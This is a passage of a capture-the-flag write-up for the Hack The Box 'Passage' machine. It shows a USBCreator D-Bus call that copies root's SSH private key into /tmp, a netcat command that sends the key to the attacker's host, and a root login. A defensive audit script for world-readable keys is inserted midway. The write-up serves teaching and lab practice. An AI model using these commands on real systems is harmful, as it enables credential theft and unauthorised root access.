USBCreator
Although it gave no details, PEAS initially flagged the target system as vulnerable to the USBCreator bug.
Later, I found out that the nadav user has made changes to two files to be able to access the USBCreator service.
This allows me to exploit the USBCreator service.
Searching Google for how to exploit this vulnerability, I came across this article.
The article points out that I am able to get the SSH key of the root user by exploiting this vulnerability using the following command:
$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/id_rsa true
I will get right to it.
nadav@passage:/tmp$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/id_rsa true
()
Executing the command succeeds and returns an empty result, ().
nadav@passage:/tmp$ ll ./id_rsa
-rw-r--r-- 1 root root 1675 mar 17 08:53 ./id_rsa
The private SSH key for the root user is indeed copied to the /tmp directory, owned by root but world-readable.
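From the defender's side, the artifact this leaves behind is a private key sitting world-readable in a scratch directory (here /tmp/id_rsa, owned by root with mode 644). The following audit helper is an added example written for this page, not code from the writeup or from the USBCreator project; it walks a directory, reports every world-readable regular file whose first line is a PEM private-key header, and returns non-zero so it can run as a cron job or health check. It assumes a POSIX find that understands symbolic -perm modes.

```shell
#!/bin/sh
# Added example (not from the original writeup): find private-key material
# left world-readable under a scratch directory, the artifact a root-level
# file copy such as the USBCreator Image call leaves in /tmp.

# Print the path of every world-readable regular file under $1 (default /tmp)
# whose first line is a PEM private-key header ("-----BEGIN ... PRIVATE KEY-----").
find_exposed_private_keys() {
    dir="${1:-/tmp}"
    # -perm -o=r: the "others read" bit is set (POSIX symbolic mode, assumed available)
    find "$dir" -type f -perm -o=r 2>/dev/null | while IFS= read -r f; do
        case "$(head -n 1 "$f" 2>/dev/null)" in
            "-----BEGIN "*"PRIVATE KEY-----") printf '%s\n' "$f" ;;
        esac
    done
}

# Return 0 when nothing is exposed, 1 otherwise, printing the offending paths.
audit_private_keys() {
    dir="${1:-/tmp}"
    hits=$(find_exposed_private_keys "$dir")
    if [ -n "$hits" ]; then
        printf 'EXPOSED private key(s) under %s:\n%s\n' "$dir" "$hits"
        return 1
    fi
    echo "no world-readable private keys under $dir"
    return 0
}
```

Run it as audit_private_keys /tmp on a live host; a key with mode 600 is not reported, so the check targets exactly the mis-permissioned copy rather than every key file on the box.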
nadav@passage:/tmp$ nc 10.10.14.4 2222 < id_rsa
┌──(kali㉿kali)-[~/archive/htb/labs/passage]
└─$ nnc 2222 > id_rsa.root
listening on [any] 2222 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.206] 54878
┌──(kali㉿kali)-[~/archive/htb/labs/passage]
└─$ chmod 600 id_rsa.root
I transferred the private SSH key for the root user using Netcat.
I also set the permission bits to 600, since SSH refuses to use a private key that is readable by other users.
┌──(kali㉿kali)-[~/archive/htb/labs/passage]
└─$ ssh root@$IP -i ./id_rsa.root
last login: Mon Aug 31 15:14:22 2020 from 127.0.0.1
root@passage:~# whoami
root
root@passage:~# hostname
passage
root@passage:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:04:69 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.206/24 brd 10.10.10.255 scope global ens160
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:469/64 scope global mngtmpaddr dynamic
valid_lft 86395sec preferred_lft 14395sec
inet6 fe80::250:56ff:feb9:469/64 scope link
valid_lft forever preferred_lft forever
System Level Compromise